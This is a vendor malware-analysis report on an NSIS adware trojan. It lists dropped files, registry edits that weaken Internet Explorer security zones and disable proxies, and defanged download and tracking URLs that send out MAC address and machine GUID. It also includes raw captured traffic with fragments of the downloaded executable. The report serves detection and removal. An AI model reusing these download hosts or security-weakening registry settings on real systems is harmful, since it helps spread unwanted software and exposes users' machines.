Trojan.NSIS.StartPage_60d0720fbe – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

TFFFL1BTSQ==10700.exe:1480
%original file name%.exe:204
wmic.exe:228
TFFFL1BTSQ==29820.exe:1180

The Trojan injects its code into the following process(es):

beeiachifd.exe:364

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process TFFFL1BTSQ==10700.exe:1480 makes changes in the file system.

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)

The process beeiachifd.exe:364 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\bodyImg[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\OperaChecker25-6[1].exe (8606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449967959\TFFFL1BTSQ==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\XPLimitChecker[1].exe (6932 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449967959\TFFFL1BTSQ==29820.exe (3333 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81449967959.txt (0 bytes)

The process %original file name%.exe:204 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\beeiachifd.exe (19192 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb1.tmp (0 bytes)

The process wmic.exe:228 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81449967959.txt (238 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\81449967959.txt (0 bytes)

The process TFFFL1BTSQ==29820.exe:1180 makes changes in the file system.

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)

Registry activity

The process TFFFL1BTSQ==10700.exe:1480 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 0B E6 3C EF 78 57 91 EF 3B 29 6C FE 0B C6 55"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\OperaOB]
"Install" = "1"

The process beeiachifd.exe:364 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 9D C1 1A 23 F4 2B 01 D7 91 1A 4B 0F 9D C5 39"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:204 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C AE 17 34 B0 03 DC 45 BD 86 96 73 E5 E4 21 20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process wmic.exe:228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 43 D9 D0 84 DE 80 8D 2D 00 75 BB 88 77 06 D5"

The process TFFFL1BTSQ==29820.exe:1180 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 99 AA 5C B3 0C BC 9C 25 B9 5C F2 90 74 F0 C0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\xplmtOB]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
10ffabc748d68c40b68f883058c9b932	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81449967959\TFFFL1BTSQ==10700.exe
b6631cd12092841cac0763c854828c50	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81449967959\TFFFL1BTSQ==29820.exe
95ce063a236c0ae33feb9022a48c773a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\beeiachifd.exe
b6631cd12092841cac0763c854828c50	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\XPLimitChecker[1].exe
10ffabc748d68c40b68f883058c9b932	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\OperaChecker25-6[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
TFFFL1BTSQ==10700.exe:1480
%original file name%.exe:204
wmic.exe:228
TFFFL1BTSQ==29820.exe:1180
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\bodyImg[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\OperaChecker25-6[1].exe (8606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449967959\TFFFL1BTSQ==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\XPLimitChecker[1].exe (6932 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449967959\TFFFL1BTSQ==29820.exe (3333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\beeiachifd.exe (19192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449967959.txt (238 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: OFEJP
Product Name: OFEJP
Product Version: 6392.151120.1377.7500
Legal Copyright: OFEJP
Legal Trademarks: OFEJP
Original Filename:
Internal Name:
File Version: 6392.151120.1377.7500
File Description: OFEJP
Comments: OFEJP
Language: English (United States)

Company Name: OFEJPProduct Name: OFEJPProduct Version: 6392.151120.1377.7500Legal Copyright: OFEJPLegal Trademarks: OFEJPOriginal Filename: Internal Name: File Version: 6392.151120.1377.7500File Description: OFEJPComments: OFEJPLanguage: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46304	c52a72deb0170941d392ec38c6aeafd0
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	298072	1024	3.32453	723ad80df002dc5421798f4307abe5cf
.ndata	335872	311296	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	647168	54360	54784	2.83672	e06cbcd325c623d4b4736cfbb1363e3b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 117
03654a08e7f65aec190ee7e37246bb5f
a212f888d46a7e2d8802888390ff3c63
470ab50ccb81409a49b2abb4c05af91f
ee0edf52085544dd5ffae3892bd06855
07da75d17d57e9bbfa0916a2ad8b95b6
e74d8056cde545c3960d49ca018101bb
e5c5fddf9ff161c0d6de11988f8358c7
38623bf8200680f3967022fd39f52daf
fad9fe2f4d34a9a3943bbf54dfc38c01
1b45146c52aa1976ffcf47b50c6e4c7c
27967ee4c772b29835d5dba868867879
22dc967254eef4719b3c514ab7029cdb
18ed19164cd0f258338a661057321695
e9197129bf89c13fa74f5e0219c735ae
32d708fbb109abf91c1a372351481a8e
cae50b748f98679ee3004f13687fdc34
7d4b556f36f5170d24469ffd6280298b
c2297a50a1f58665aa97177a0357616e
9398d852900b4c351c5b8e38699dcd70
2f81cfbd26709f9f88985ed83777256d
562eb5ad8564d3591007404a367df858
02c83ab655f98711ad1fbb3123b78438
6daeb82e5bcd31515b4a926d6cba88b3
f9b90420cd1aef0263de7ca339f8947b
63745fe6fef243a667c80f8d31228f33
ad9ae311a36924f84d2f4d7c9571f8a2

Network Activity

URLs

URL	IP
hxxp://cdn-ppdownload.outbrowse.netdna-cdn.com/Installer/OperaBrowser/OperaChecker25-6.exe
hxxp://d2vubraihqcany.cloudfront.net/Installer/XP/XPLimitChecker.exe	216.137.59.80
hxxp://smartinstaller.elasticbeanstalk.com/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=379394606&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0
hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
hxxp://stats.l.doubleclick.net/dc.js
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topComp.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topLine.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bgImg.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bodyImg.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bottomLine.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/nextCase.jpg
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button_over.png
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button.png
hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=379394606&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0
hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&version=6.12&nipids=-29408-28693-12929-28657-29219-29736&secondcall=1&reqid=379394606
hxxp://static.revenyou.com/offers/images/Theme12/nextCase.jpg	198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/bgImg.jpg	198.232.124.224
hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&version=6.12
hxxp://static.revenyou.com/offers/images/Theme12/bodyImg.png	198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/bottomLine.jpg	198.232.124.224
hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=379394606&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0
hxxp://stats.g.doubleclick.net/dc.js	64.233.165.155
hxxp://static.revenyou.com/offers/images/Theme12/topComp.png	198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/topLine.jpg	198.232.124.224
hxxp://static.revenyou.com/offers/images/Theme12/button.png	198.232.124.224
hxxp://cdn.download4desktop.com/Installer/OperaBrowser/OperaChecker25-6.exe	198.232.124.192
hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&	54.235.116.119
hxxp://static.revenyou.com/offers/images/Theme12/button_over.png	198.232.124.224
srv.desk-top-app.info	50.19.230.190

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /dc.js HTTP/1.1

Accept: */*

Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: stats.g.doubleclick.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Strict-Transport-Security: max-age=10886400

Date: Sat, 12 Dec 2015 23:15:33 GMT

Expires: Sun, 13 Dec 2015 01:15:33 GMT

Last-Modified: Thu, 05 Nov 2015 22:24:16 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 15977

Cache-Control: public, max-age=7200

Age: 5833

...........}kW....w~........pk..f......Z.R..Y.C 8i.pi......b..}.>g..Kl...}4....d....O...-.....`~...E...]7..>..>....Pf.a.yU."HCC...i...T*..b.....'..Olf[.Y.[c6P/.....'n.m'..m.... !_XXll..&..(..E..V=/.u.X..%.w...i..rDoT.....?>z..1`.D...y...y7. \...5ZI...TA..........C...p3..A..x.k.q4.2...?L.k=.v....4.:sB[...l.w.o {.....?Nc....|..........q.........[.n..2..X~.......S.f.]h~....7:.n...m.C#6...........#....y...7.|..f.W.>..wS......)..Q....i......z......D.`...7N....y.C;....`1....x..p.tG.L..=..1r...M..2..)xa...{0!..5...^...7..."..........J8... ...5.O....l...r...|....R...P.0ok.8.Z.2....i|...S.y.od...~..k.>.....0vGr.mI.....0.&&yg.sf2......m.....G=0..B.6..u....A.h.A.0.V.:.-...j..L.....5.E.[...Q.{2imA......T........~. ...0*%.....>......hX...ga1./$......f.#..d,.|www5/XX...c5..D-.....p.h..8D.@./.X,.....&gTV..5..,.x..?.....(.>?6Sy.].`.]...'-"....-...........(.n.@_"p"`.*...T.1.$..t.....o?.."../.kX.)L.....-.....E1M.....@..T.F9.,HP........# ....d...-,.......-.j..BS....9...%.~Sug,...`."...4a..@.p]..yn.i(5.....U.r..$j..0{|.i.5........H}.......A=..&.Vq....4<..*7c.<b.....OQ8X...&..a/a.....aI.j.7.E.:cuV=.P.q..d.....X....#..@.T...q......U.T~.@.C......S.#....Q.....K......A.y._....z|..9...9.zM......%m........m).?4.Q...c.....PTDB&..7.-G....E.....E.7.t.V..G....._..!.....xt..}.......Ev..x..a.{...d.. .q./..OB|..6..{....a^.......@?.......o.....*T.;/Oa.......J..........I.)......J..#..A....FS.....t.H..h...W..|B.~..t.6..........t"<..z..||.......8..B9......x.a....m.V[.=...K!..\.....w."d...=>.B..(K...u.....~.".@b

<<< skipped >>>

GET /Installer/OperaBrowser/OperaChecker25-6.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn.download4desktop.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sun, 13 Dec 2015 00:52:43 GMT

Content-Type: application/octet-stream

Content-Length: 50225

Connection: keep-alive

x-amz-id-2: SjMFw 8UHgzEB68ED0Ymo4B1uV3ZeKvkfyFPOEHgt9zswDSPkiO/ cPM83zCoJoO3W0D1nqXHoU=

x-amz-request-id: 2AD315F4FFF678D5

Last-Modified: Wed, 25 Jun 2014 14:41:23 GMT

ETag: "10ffabc748d68c40b68f883058c9b932"

Server: NetDNA-cache/2.2

Content-Disposition: attachment

X-Cache: HIT

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t..........PC...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...PC.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&version=6.12 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Host: srv.DESK-TOP-APP.INFO

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Date: Sun, 13 Dec 2015 00:52:39 GMT

Server: Microsoft-IIS/8.0

X-AspNet-Version: 4.0.30319

X-AspNetMvc-Version: 4.0

X-Powered-By: ASP.NET

Content-Length: 18436

Connection: keep-alive

..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"8,$.Fmkcsez_oajgRvjdo"8.(.% O_fGew.2.AIBS^?UPM=IM]RMDN Qj^op_o_[XAkd_j.nsv.x FF=TXARLQANRZMN>P.Mnbtu\j`UZJ[hh.PpTW:kfanEnqoYgeco.qbr '.M^eH_x24 5.CDCVYBQRP@FOXSP?Q.SmalrZpbV[=mgbg.ity.{.HI@QZ<SOLDJT]PK@K.Piepw_m]WUK^ck*RsWT<fgdiHjsr\dg^p.len"*.J`imonM]mc.2.:kfan>rmrk`k ).Onobp[oBB.4154.3$.:jt[xoOda]m.8-&!EsU\ao?moCmot_gd.3/).DteSMD.3 ensl:-*Yhbel\hj.a_fhZgi(qq/?habhBfmsni`)]s^ ).DteSMD-.8.bspp8*'\fgdiaen,^\if_ff-nu-<ed`mAcrprg]&`qc.&!?okhYi]Jfhd.: ..<fgdiCesrma]'cu_.)-qdd`gr.',nfp8/32/43.)-s\Wm_p:=G=NL@DZ066 65 (e\dc*^dbasgl8*.*'o]rri]mXlbq^qrj8`omn7).iebdYghed_q*rs*Ykb-p[uaPmnl]Zah9skkci5hBA>mNLJ0ok!`sf^< _]BMD=$pcf9$]ZKD@$lpq9$]ZGQK$o_e9764)22$`bh`=00*3.a^cc925/.ornb7`iiej..% L`earSMD.3 ensl:-*kmo,P?QREP?9O:QOP-_ok*'j_dblr DwiYhbaL`earQ^j`^l<iebepd\8/12 onobp[obb:,8006!\dlrf^</01.0!ec^^o9270.0.alomprwd\8 4/ rus`dl8,0#]nkkg`hmhbr]sjak`5Pib^ndo&baZ8)$e\<1&gnYb`;. uarqdgi64 1"evo]mg_i7/., MYo^ 7'0("?_\dmglh`hD_oY.3 .&!=nrdndksp_rNeeF]tl 7.ZY"*.H\rmrn!6-/'.@_db]sevc.2(**.JqkmmoajgP^nd.: ,$.=gp]qap_i[tK_q_!6-/'.Necbj@btcmAilr^fk.:.'.Qbpqo`hOda]m<mjg`jdJdf`.8kokh, >YiKsk;r?hc^c]hv.4snuc'.MnlFh@cgp`knbtbCmot_gd`k 7.0., MmiBlO_fql_mAilr^fkar 5.,.*.JqaEv`J`lsinSark.2.) ).OneCs]M^qrfsRajp].3 -. .Pmnl@qcO_rqlrO]mf 7./., KgnmCu_QassglQZjr_!6"..$.ImpnQagI`q. 7.GGEWZ;PKPBHS[UQ@J.Lmcnv]rcWT<fgdi.lvz.t.AIBS^?UPM=IM]RMDN Qj^op_o_[XM_dd)K

<<< skipped >>>

GET /Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=379394606&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:50:56:3B:0E:71&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=212.178.30.28&downloadtime=11/20/2015 2:38:00 PM&clickid=&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Host: srv.DESK-TOP-APP.INFO

Connection: Keep-Alive

HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

